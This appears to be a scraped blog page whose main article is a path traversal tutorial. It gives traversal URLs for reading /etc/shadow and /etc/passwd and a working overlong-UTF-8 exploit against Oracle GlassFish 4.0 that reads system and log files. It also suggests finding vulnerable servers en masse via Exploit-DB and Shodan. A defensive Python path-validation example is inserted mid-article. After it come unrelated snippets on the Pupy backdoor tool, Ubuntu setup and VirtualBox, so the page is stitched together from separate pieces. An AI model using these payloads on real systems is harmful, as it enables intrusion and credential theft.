In addition to the public documents, various other files are uploaded to a web server: scripts, configuration templates and other documents. When the server is configured properly, a user cannot reach these files; he simply has no rights to other directories. Usually, when you request such a page, you get a 403 error code.
We are particularly interested in cases where configuration errors occur and these directories (by accident or carelessness) are open, so that we get access with full rights (root). This lets us view files, change them and perform other manipulations. That is what we will do today, working through concrete examples.

How to find such a vulnerability?
It is very useful to study information about vulnerabilities that have already been found and described: for example, find a vulnerable plugin or CMS in the Exploit Database, check similar systems in Shodan and collect the actual results. This method is better suited to cases where you want to gain access to servers en masse rather than to check a specific one.

Automatic scanners such as Acunetix and Netsparker are ideal for specific tasks. Almost the most common case is a file name passed as a parameter in the URL:
http://some_site.com.br/get-files.jsp?file=report.pdf
And then it turns into this:
http://some_site.com.br/../../../../etc/shadow
http://some_site.com.br/get-files?file=/etc/passwd
In general it looks like this:
http://some_site.com.br/../../../../some dir/some file
There are also automatic tools such as dotdotpwn, which you can download from GitHub. The tool has not been updated for a long time, but it still does its job well.
The software is as simple as possible, but it quickly tries the possible variants from its payload list.
If something is found, we see the following message:
Let's move on to practice.
Oracle GlassFish 4.0
Rather than dwell on boring theory, I will show it in practice. I came across a server running this version. Well, isn't that luck?

We check it for vulnerabilities on exploit-db and get a page with the title "GlassFish Server - Arbitrary File Read".
From this page we need the string that allows reading the /etc/passwd file. It is interesting simply because it lists the system's users, their login names and IDs, and their home directories. Password information is usually stored elsewhere. So we append the following to the address (instead of http://site.com:4848 substitute your domain and port):
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
In the response we read the contents of the file.
We can also try to pull out information about the system, or provoke additional errors, with this request:
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/issues
But the most interesting part is when you learn that some data is loaded from a file and you know where that file is. Then reading it is no trouble at all: instead of our standard file name, add the needed one and get its contents. For example, I knew for sure that the logs.txt file was in the root. There may be other files too: logs, scripts, and even data with access credentials for other servers.
      http://site.com:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs.txt
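As an added example (my own code, not from the exploit-db entry or from GlassFish), here is the defensive side of the requests shown above. The %c0%ae sequence is an overlong UTF-8 encoding of '.', so a filter that only looks for a literal '..' in the raw URL never sees the traversal, and neither does it see the plain %2e%2e form. A handler that percent-decodes, rejects malformed UTF-8 strictly, normalises the path and only then requires the result to stay under the document root closes both forms regardless of how many slashes are supplied. The document root /var/www/html is an assumed value.

```python
import os
from urllib.parse import unquote_to_bytes

DOCROOT = "/var/www/html"  # assumption: the directory the server may serve from


def naive_check(raw_path: str) -> bool:
    """The kind of filter the GlassFish request above slips past: it only looks
    for a literal '..' in the raw request path, so '%c0%ae%c0%ae' (and even
    '%2e%2e') passes."""
    return ".." not in raw_path


def decode_strict(raw_path: str):
    """Percent-decode, then UTF-8-decode strictly. Python's strict decoder rejects
    overlong sequences such as C0 AE (the '%c0%ae' of the request above) and
    this returns None for them instead of turning them into a '.'."""
    try:
        return unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError:
        return None


def resolve_safe(raw_path: str, docroot: str = DOCROOT):
    """Map a request path to a file under docroot, or return None if it escapes.
    The containment check is done on the normalised absolute path, never on the
    raw request string."""
    decoded = decode_strict(raw_path)
    if decoded is None or "\x00" in decoded:
        return None
    candidate = os.path.normpath(os.path.join(docroot, decoded.lstrip("/")))
    # After normalisation every '..' has been resolved; the only question left
    # is whether the result still lies inside docroot.
    if os.path.commonpath([docroot, candidate]) != docroot:
        return None
    return candidate


# Request paths: the overlong form from the page, the same traversal in plain
# percent-encoding, and an ordinary request (the last two are constructed).
OVERLONG = ("theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/"
            "%c0%ae%c0%ae/etc/passwd")
PLAIN = "theme/META-INF/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
LEGIT = "get-files/report.pdf"

if __name__ == "__main__":
    print("naive filter lets the overlong request through:", naive_check(OVERLONG))
    for path in (OVERLONG, PLAIN, LEGIT):
        print(path, "->", resolve_safe(path))
```

On a live server, resolve the candidate with os.path.realpath before the containment check as well, so that a symlink inside the document root cannot point outside it; the normalisation shown here works on the path string alone and does not touch the file system.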
Conclusion
This is what this vulnerability looks like. It occurs on all sorts of resources. With it you can download files, read configs and reach interesting directories. By my own count of vulnerabilities found, it takes a solid third place after the incredible XSS and SQL injection, which we will analyze in the following articles. Remember that automatic tools and approaches are always good, but sometimes you have to sweat and find something by hand; after all, scanners do not see everything. The result can bring good money, because even a site checked a thousand times may not yet have been combed for every hole. That's all until the next articles.

Pupy remote administration tool

Pupy is an open source, cross-platform tool for remote administration (Windows, Linux, OSX and Android are supported as "clients") and post-exploitation. It is written mostly in Python.

Simply put, this program can create backdoors for different systems, perform actions to attach to remote systems, run exploits to collect data, escalate privileges, download and upload files, capture the screen, capture keystrokes, and so on. Like other similar tools, it is also perfectly suitable for legitimate remote administration of systems.
Potential Pupy uses:
• Security research
• Education
• Penetration testing
• System administration
• Privacy projects focused on Python that require minimal interaction with persistent storage (so as not to leave traces on the hard disk)
• And others…
This is one of several articles about Pupy; it describes the installation step by step. The following articles will cover the principles of the program, basic concepts and practical examples of use.

Things to do after installing Ubuntu 19.04

As you may know, Ubuntu is the most popular distribution, and although the developers try to make it so that users do not have to spend much time on settings, there are still many things that are missing by default.
This article looks at setting up Ubuntu after installation: adding repositories, configuring the shell and installing the most needed programs.

How to install Ubuntu on VirtualBox

In many cases it is more convenient to configure a virtual machine and install the necessary programs on it than to do so on a real computer. First, when installing on a "clean" virtual machine there is a greater chance that everything will go without errors, since there will be no conflicts with already installed programs. Second, the virtual system can easily be "rolled back" to a previous state if something goes wrong. Third, all virtual machine data is stored as files on your computer, so it is easy to copy it elsewhere and, for example, take it with you on a business trip to work in a familiar virtual environment on any real computer. Fourth, virtually any operating system (OS) can be installed on a virtual machine, including one that differs from the system installed on your computer.